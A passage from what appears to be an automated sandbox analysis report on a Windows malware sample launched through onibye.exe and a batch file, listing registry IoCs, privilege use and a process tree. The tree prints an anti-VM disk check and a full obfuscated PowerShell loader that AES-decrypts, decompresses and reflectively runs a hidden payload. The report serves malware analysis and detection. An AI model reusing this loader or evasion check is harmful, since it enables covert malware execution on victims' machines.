z0aMLd216DUK1XT1DXwzh0v/GXbFcYSNlGmdXaHedyuj1K6BHFzbiDPeZ2QxhkbFbtBs0EEr3Dmh+1H7TzFcwsMgBVRZjo/ErqG8KuEi4Y3HZlERDfoHlJuHZGbWGHkpHj2oPHvzfiP53DAhe5wYq7aVZRLRH0aJuSUJgk4t1rUKD9I+DdCwiHVgGpAQGr3l52Hf5SB/sVct3hLYlAAAAAX6rx5rjrccYa38Yd1hVh087k2m991Tl7so+Tpu7CB2KQ6Ng7PHDyO0+XvgvIY4zEb1bOvjA/xp2oog2h05kTrw=="	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02semdfilfmqarqt\DeviceId = "<Data DAInvalidationTime=\"1735427742\"><User username=\"02SEMDFILFMQARQT\"><HardwareInfo BoundTime=\"1735427742\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\ValidDeviceId	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02semdfilfmqarqt\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02gigefeqqnyaeub\DeviceId = "<Data LastUpdatedTime=\"1735427739\"><User username=\"02GIGEFEQQNYAEUB\"/></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\URL = "https://login.live.com"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Data = "ct%3D1735427740%26hashalg%3DSHA256%26bver%3D24%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C559_BAY.0.D.CjtNVQHsH9wFA1UMptiUTOvuypjkuWVNDUx8m6pkgRvqQcHdvmLnE7X9%252BNCYZms6WYcVdneM5Qx%252BiSQsSAVNFRKbBMywzGexZ3XdWPtVYt%252BV4IK3IdSvo2rQcq3nGPJexquY3H6F44a4ZmRelSNMeycOLkQJj6pd85Jhu2pIE%252BwOQqk%252Bw19wcFfyQ508rFmUc6PaH7ubEO2atV%252BQrbfxwm4tRC%252BwPbXQLuvbx0Ivdn5okkaDc5OuCrwMYPioxpAxdQid3DBTNSKfmYMWOH2Mt3eSWx67HUdybhzTjR5DV6O7epPmUsJCRYLqnM1HP53EcD9SlczHeT/3juo7pnpXRltsWlEjtiHa4JNaeNTDSaO1PAJuwSyqRHsq78nY1xuaeZ5ieRZX03UEdUhkGhY5kgEyOgidWXAFICch0xGHAlap0RMCidFv8%252BXmIzXCRrEy9cHXM7ays4Ar91rJOO6kaTvv0UnQ/XAMMEkppN/Ze2wOp6eW6t3a%252BEeKeRkAmqtL9ETqVNFR0qkT3%252BX8YW7sYls%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3Dt4qvQS8m3ll1JwJ3h%252B1HgIlIsC0mUzX2%26hash%3DSusyHza0NkrafL%252F8wUuFZVNjSmgcPdGilIL4sCWpdnU%253D%26dd%3D1; path=/; domain=login.live.com; secure; httponly"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\ValidDeviceId = "02semdfilfmqarqt"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	onibye.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gigefeqqnyaeub	svchost.exe

Modifies registry class 3 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 608677.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4576	powershell.exe
4576	powershell.exe
680	msedge.exe
680	msedge.exe
4724	msedge.exe
4724	msedge.exe
4576	powershell.exe
4576	powershell.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
5036	powershell.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe
5036	powershell.exe
2808	dllhost.exe
2808	dllhost.exe
2808	dllhost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	2808	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2332	svchost.exe
Token: SeIncreaseQuotaPrivilege	2332	svchost.exe
Token: SeSecurityPrivilege	2332	svchost.exe
Token: SeTakeOwnershipPrivilege	2332	svchost.exe
Token: SeLoadDriverPrivilege	2332	svchost.exe
Token: SeSystemtimePrivilege	2332	svchost.exe
Token: SeBackupPrivilege	2332	svchost.exe
Token: SeRestorePrivilege	2332	svchost.exe
Token: SeShutdownPrivilege	2332	svchost.exe
Token: SeSystemEnvironmentPrivilege	2332	svchost.exe
Token: SeUndockPrivilege	2332	svchost.exe
Token: SeManageVolumePrivilege	2332	svchost.exe
Token: SeShutdownPrivilege	3484	Explorer.EXE
Token: SeCreatePagefilePrivilege	3484	Explorer.EXE
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeAuditPrivilege	2132	svchost.exe
Token: SeAuditPrivilege	2132	svchost.exe
Token: SeShutdownPrivilege	3484	Explorer.EXE
Token: SeCreatePagefilePrivilege	3484	Explorer.EXE
Token: SeTcbPrivilege	660	svchost.exe
Token: SeTcbPrivilege	660	svchost.exe
Token: SeTcbPrivilege	660	svchost.exe
Token: SeTcbPrivilege	660	svchost.exe
Token: SeTcbPrivilege	660	svchost.exe
Token: SeShutdownPrivilege	5304	svchost.exe
Token: SeCreatePagefilePrivilege	5304	svchost.exe
Token: SeShutdownPrivilege	5304	svchost.exe
Token: SeCreatePagefilePrivilege	5304	svchost.exe
Token: SeShutdownPrivilege	5304	svchost.exe
Token: SeCreatePagefilePrivilege	5304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2332	svchost.exe
Token: SeIncreaseQuotaPrivilege	2332	svchost.exe
Token: SeSecurityPrivilege	2332	svchost.exe
Token: SeTakeOwnershipPrivilege	2332	svchost.exe
Token: SeLoadDriverPrivilege	2332	svchost.exe
Token: SeBackupPrivilege	2332	svchost.exe
Token: SeRestorePrivilege	2332	svchost.exe
Token: SeShutdownPrivilege	2332	svchost.exe
Token: SeSystemEnvironmentPrivilege	2332	svchost.exe
Token: SeManageVolumePrivilege	2332	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2332	svchost.exe
Token: SeIncreaseQuotaPrivilege	2332	svchost.exe
Token: SeSecurityPrivilege	2332	svchost.exe
Token: SeTakeOwnershipPrivilege	2332	svchost.exe
Token: SeLoadDriverPrivilege	2332	svchost.exe
Token: SeSystemtimePrivilege	2332	svchost.exe
Token: SeBackupPrivilege	2332	svchost.exe
Token: SeRestorePrivilege	2332	svchost.exe
Token: SeShutdownPrivilege	2332	svchost.exe
Token: SeSystemEnvironmentPrivilege	2332	svchost.exe
Token: SeUndockPrivilege	2332	svchost.exe
Token: SeManageVolumePrivilege	2332	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2332	svchost.exe
Token: SeIncreaseQuotaPrivilege	2332	svchost.exe
Token: SeSecurityPrivilege	2332	svchost.exe
Token: SeTakeOwnershipPrivilege	2332	svchost.exe
Token: SeLoadDriverPrivilege	2332	svchost.exe
Token: SeSystemtimePrivilege	2332	svchost.exe
Token: SeBackupPrivilege	2332	svchost.exe
Token: SeRestorePrivilege	2332	svchost.exe
Token: SeShutdownPrivilege	2332	svchost.exe
Token: SeSystemEnvironmentPrivilege	2332	svchost.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
3484	Explorer.EXE
3484	Explorer.EXE
3484	Explorer.EXE
3484	Explorer.EXE
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
4724	msedge.exe
3484	Explorer.EXE
3484	Explorer.EXE
3484	Explorer.EXE
3484	Explorer.EXE
3484	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5036	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4744 wrote to memory of 1252	4744	cmd.exe	83
PID 4744 wrote to memory of 1252	4744	cmd.exe	83
PID 4744 wrote to memory of 1868	4744	cmd.exe	84
PID 4744 wrote to memory of 1868	4744	cmd.exe	84
PID 4744 wrote to memory of 4068	4744	cmd.exe	85
PID 4744 wrote to memory of 4068	4744	cmd.exe	85
PID 4744 wrote to memory of 4576	4744	cmd.exe	86
PID 4744 wrote to memory of 4576	4744	cmd.exe	86
PID 4724 wrote to memory of 2088	4724	msedge.exe	90
PID 4724 wrote to memory of 2088	4724	msedge.exe	90
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 4024	4724	msedge.exe	91
PID 4724 wrote to memory of 680	4724	msedge.exe	92
PID 4724 wrote to memory of 680	4724	msedge.exe	92
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93
PID 4724 wrote to memory of 736	4724	msedge.exe	93

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{499a87b0-f8e9-48ed-ae27-ec248988fc7d}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a7b48272-4f5a-4572-98c7-3b0edc7378bd}
  2⤵
  PID:5780
- C:\Users\Admin\Downloads\onibye.exe
  "C:\Users\Admin\Downloads\onibye.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:5900
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4336
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 5900 -s 1756
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5940
- C:\Users\Admin\Downloads\onibye.exe
  "C:\Users\Admin\Downloads\onibye.exe"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:3752
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5128
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3752 -s 1744
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:3568

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1136
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1304
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2020

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2720

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2908

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3372

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1016
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:1252
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
    3⤵
    PID:1868
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function Hhsg($LiTn){ Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$DeVs=[heSheyshetheehemhe.heSheecheuherheihethey.heCrheyphetheohegherahephehyhe.heAheeheshe]:he:Cherheeahetehe(he);'.Replace('he', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$DeVs.MIHoIHdeIH=IH[IHSIHyIHsIHteIHmIH.IHSIHeIHcuIHriIHtyIH.IHCIHrIHypIHtIHogIHrIHaIHpIHhIHy.IHCiIHpIHheIHrMIHoIHdIHeIH]IH::IHCBIHC;'.Replace('IH', ''); Invoke-Expression -Verbose '$DeVs.Pljaljddljiljnljglj=lj[ljSyljsljtljeljmlj.Sljecljurljiljtljylj.Cljrljypljtljoljgljrljapljhylj.ljPaljddljiljnljgljMljodlje]lj:lj:PljKljCSlj7lj;'.Replace('lj', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$DeVs.KHheHhy=Hh[HhSHhyHhsHhtHhemHh.HhCHhoHhnHhveHhrtHh]:Hh:HhFHhrHhomHhBHhasHheHh6Hh4HhSHhtrHhinHhgHh("gHhbHh5jHhQHhWHhRHhKHhWHhZrHhgHhJHh9HhNHhDNHhseHhnGHhFHhNHhAHhBxHhNHhWxHhFHhsHh2HhKHhy8HhoaHhNHh0RHhp8HhMHh=");'.Replace('Hh', ''); Invoke-Expression -Debug -WarningAction Inquire '$DeVs.IUOVUO=[UOSUOyUOsUOtUOeUOm.UOCUOoUOnUOvUOerUOt]UO::UOFUOrUOoUOmBUOaUOseUO6UO4UOSUOtUOriUOngUO("VUORUOrPUOaUOhUOWUO+UOjUOBtUOXUOOUOTUORUOTxUO0eUOfbUOgUO=UO=");'.Replace('UO', ''); $wkZk=$DeVs.CreateDecryptor(); $NmOc=$wkZk.TransformFinalBlock($LiTn, 0, $LiTn.Length); $wkZk.Dispose(); $DeVs.Dispose(); $NmOc;}function DmpQ($LiTn){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire '$YiDY=Nszeszw-szOszbszjszeszcszt szSszyszssztszemsz.IszO.szMszeszmszorszyszStszrszeszaszm(,$LiTn);'.Replace('sz', ''); Invoke-Expression -Verbose '$wirR=Nszeszw-szOszbszjszeszcszt szSszyszssztszemsz.IszO.szMszeszmszorszyszStszrszeszaszm;'.Replace('sz', ''); Invoke-Expression -InformationAction Ignore -Verbose '$UvnG=NRleRlw-RlORlbRljRleRlcRlt RlSRlyRlsRltRlemRl.IRlO.RlCRloRlmRlprRleRlssRliRloRlnRl.RlGZRlipRlSRltrRleaRlmRl($YiDY, [RlIRlO.RlCRloRlmRlpRlrRlesRlsRliRloRlnRl.CRlomRlprRleRlsRlsRlioRlnRlMoRldRleRl]Rl:Rl:DRlecRloRlmpRlreRlsRls);'.Replace('Rl', ''); $UvnG.CopyTo($wirR); $UvnG.Dispose(); $YiDY.Dispose(); $wirR.Dispose(); $wirR.ToArray();}function aQPr($LiTn,$kClj){ Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$oOWF=[WWSWWysWWtWWeWWmWW.WWRWWefWWlWWeWWcWWtWWioWWn.WWAsWWsWWeWWmWWblWWyWW]:WW:WWLWWoWWaWWd([byte[]]$LiTn);'.Replace('WW', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$SUjQ=$oOWF.EClnCltrClyClPCloCliClnClt;'.Replace('Cl', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$SUjQ.SYISYnvSYoSYkSYeSY(SY$SYnuSYlSYlSY, $kClj);'.Replace('SY', '');}$ktyR = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $ktyR;$AWzc=[System.IO.File]::ReadAllText($ktyR).Split([Environment]::NewLine);foreach ($dMFJ in $AWzc) { if ($dMFJ.StartsWith('gbUIp')) { $OujB=$dMFJ.Substring(5); break; }}$JACM=[string[]]$OujB.Split('\');Invoke-Expression -Verbose -InformationAction Ignore -Debug '$xGG = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');Invoke-Expression -Verbose -WarningAction Inquire '$bQz = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$urF = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[2].Replace("#", "/").Replace("@", 